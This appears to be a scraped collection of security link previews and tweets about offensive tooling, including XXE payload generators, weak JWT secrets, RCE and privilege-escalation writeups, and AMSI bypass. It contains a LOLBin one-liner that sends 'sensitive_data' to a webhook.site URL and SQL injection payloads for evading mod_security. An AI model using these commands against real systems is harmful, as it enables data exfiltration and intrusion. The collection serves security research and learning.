Migrating to the cloud means sharing responsibility for security with the cloud provider. Read about one important part of the shared responsibility model: keeping your cloud network secure. Discover how to protect your cloud networks from attackers.

List DTDs and generate XXE payloads using those local DTDs. - GoSecure/dtd-finder

If you want your own Burp Collaborator, but with more protocols and web panel here it is https://t.co/jUZj6VWAy7

340 weak JWT secrets you should check in your code. Don't leave your web app's authentication exposed to hackers. Review this list

I recently took a Black Hat course by MDSec called

TCP/UDP Non-HTTP Proxy Extension (NoPE) for Burp Suite. - summitt/Nope-Proxy

A Server-Side Template Injection was identified in Netflix Conductor enabling attackers to inject arbitrary Java EL expressions, leading to a pre-auth Remote Code Execution (RCE) vulnerability.

Use angr in Ghidra. Contribute to Nalen98/AngryGhidra development by creating an account on GitHub.

Video post by @hardik05.

Contribute to b1ack0wl/linux_mint_poc development by creating an account on GitHub.

Contribute to rdoix/Buffer-Overflow-Cheat-Sheet development by creating an account on GitHub.

In this article I’ll cover the prototype pollution vulnerability and show it can be used to bypass client-side HTML sanitizers. I’m also considering various ways to find exploitation of prototype pollution via semi-automatic methods. It could also be a big…

Posted by Ben Hawkes, Project Zero When writing an Android exploit, breaking out of the application sandbox is often a key step. There are a...

Another way to use #LOLBins for data exfiltration "C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\bin\wsdl.exe" /server https[:]//webhook.site/xxxxx-xxxx-xxxxxx?sensitive_data 🚧UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol…

JuicyPotato was a go-to exploit whenever I found myself with a Windows shell with SeImpersonatePrivilege, which typically was whenever there was some kind of webserver exploit. But Microsoft changed things in Server 2019 to brake JuicyPotato, so I was really…

DmEnrollment Service - MDMdiagnostics Insecure registry export - Escalation of Privilege The DmEnrollemnt service provides functionality that exports various data relevant for adminstration of computers managed by central authorities as schools or workplaces.…

sql injection mod_security bypass usando distinct -1' union+select+1+--+✖️ -1' union+distinct+select+1+--+✖️ -1' and union+distinct+select+1+--+✖️ -1' and .0union+distinct+select+1+--+✅ un bypass no siempre es complicado #bypass #sql #CyberSecurity #payloads

This blog post will cover some lets say more advanced AMSI triggers. I decided to build a custom Invoke-Mimikatz script without AMSI trigger. I will also cov...